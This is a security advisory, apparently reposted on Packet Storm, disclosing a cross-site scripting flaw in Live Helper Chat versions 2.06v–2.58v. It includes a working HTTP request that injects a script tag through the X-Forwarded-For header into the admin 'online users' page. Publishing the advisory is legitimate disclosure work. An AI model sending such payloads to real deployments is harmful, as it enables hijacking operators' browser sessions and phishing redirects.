all things security

Live Helper Chat 2.58v Cross Site Scripting

Live Helper Chat 2.58v Cross Site Scripting
Posted Apr 27, 2017
Authored by Sylvain Heiniger

Live Helper Chat versions 2.06v through 2.58v suffer from a cross site scripting vulnerability.

tags | exploit, xss
MD5 | eac74b8c82e6af650a63fda1f1be2590

Live Helper Chat 2.58v Cross Site Scripting

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/en/research/advisories/
#############################################################
#
# CSNC ID: CSNC-2017-004
# Product: Live Helper Chat [1]
# Vendor: Live Helper Chat
# Subject: Cross-Site Scripting - XSS
# Risk: High
# Effect: Remotely exploitable
# Author: Sylvain Heiniger (sylvain.heiniger@compass-security.com)
# Date: April 24, 2017
#
#############################################################


Introduction:
----------------
Live Helper Chat is a live chat support for websites. It provides a simple
solution for companies to get in contact with visitors of their websites. [1]

Compass Security discovered a web application security flaw in the Live
Helper Chat application which allows an attacker to execute JavaScript code in
the browser of a user. This allows, for instance, attacking the user's browser
or redirecting the user to a phishing website. The attack will be in some cases
automatically run in the backend operator's session. Otherwise, one can send
the victim a link to the website with the malicious payload.


Affected Versions:
-----------------------
The following Live Helper Chat versions are vulnerable:
- 2.06v - 2.58v [2]


Patches:
-----------
Live Helper Chat released a patch as part of release 2.60v [3, 4].


Technical Description:
-----------------------------
Live Helper Chat detects the visitor's IP address. To this end, it reads the
"X-Forwarded-For" HTTP header. Any visitor can inject a <script> tag in this
header. It will be reflected in the administrator's "online users" information
page as well as in the "print chat" page.

User's request:
===============
POST /lhc_web/index.php/chat/chatwidget/(vid)/47428qicplsqmfe9huq2/(leaveamessage)/true HTTP/1.1
Host: localhost
X-Forwarded-For: <script>alert(1);</script>
Connection: close
Content-Length: 188

Username=Example&Question=My+question&user_timezone=2&URLRefer=%2F%2Flocalhost%2F&r=&operator=0&StartChat=1&captcha_1977271e431742414c31477d258028664d713ae0=1475518554&tscaptcha=1475518554
===============

Subsequent request to the online users page /lhc_web/index.php/site_admin/chat/onlineusers/(method)/ajax/(timeout)/3600/(maxrows)/50 will be responded with:
===============
[{"id":"1","ip":"<script>alert(1);<\/script>","vid":"47428qicplsqmfe9huq2", [JSON MESSAGE CUT]
===============

Note: the above JSON response is sent by the application with the content-type text/html,
making it vulnerable to XSS as is.


Milestones:
---------------
2017-03-14: Vulnerability discovered
2017-04-23: Vendor notified
2017-04-23: Vendor provided patched version
2017-04-28: Public disclosure


References:
---------------
[1] https://github.com/LiveHelperChat/livehelperchat/
[2] https://github.com/LiveHelperChat/livehelperchat/commit/f93d092c634f52098d578883ef8d069313d460ec
[3] https://livehelperchat.com/new-version-2.60v-security-update-460a.html
[4] https://github.com/LiveHelperChat/livehelperchat/commit/eee03f77f3f51fed613c5e306152ea60255edba2

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

October 2017

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    15 Files
  • 2
    Oct 2nd
    16 Files
  • 3
    Oct 3rd
    15 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    11 Files
  • 6
    Oct 6th
    6 Files
  • 7
    Oct 7th
    2 Files
  • 8
    Oct 8th
    1 Files
  • 9
    Oct 9th
    13 Files
  • 10
    Oct 10th
    16 Files
  • 11
    Oct 11th
    15 Files
  • 12
    Oct 12th
    23 Files
  • 13
    Oct 13th
    13 Files
  • 14
    Oct 14th
    12 Files
  • 15
    Oct 15th
    2 Files
  • 16
    Oct 16th
    16 Files
  • 17
    Oct 17th
    2 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close